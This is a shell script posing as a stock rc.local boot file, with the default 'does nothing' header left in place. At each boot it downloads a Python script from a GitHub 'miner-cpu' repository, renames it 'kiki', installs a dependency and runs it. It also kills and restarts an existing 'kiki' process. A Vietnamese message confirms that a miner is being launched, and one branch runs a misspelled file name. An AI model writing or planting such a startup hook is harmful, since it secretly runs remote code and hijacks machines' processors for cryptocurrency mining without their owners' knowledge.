#!/bin/sh -e
#
# rc.local
#
# This script is executed at the end of each multiuser runlevel.
# Make sure that the script will "exit 0" on success or any other
# value on error.
#
# In order to enable or disable this script just change the execution
# bits.
#
# By default this script does nothing.
if [ -f ${PWD}/kiki ]; then
    if pgrep -x "kiki" > /dev/null
then
pkill kiki
echo " kill process"
pip install argon2_cffi
python3 kiiki

    
else

echo "Miner da install , chay thoi "
pip install argon2_cffi
python3 kiki
     
fi
exit
fi

wget https://raw.githubusercontent.com/StupidmanTan/miner-cpu/master/myario.py
pip install argon2_cffi
mv myario.py kiki
python3 kiki
exit 0
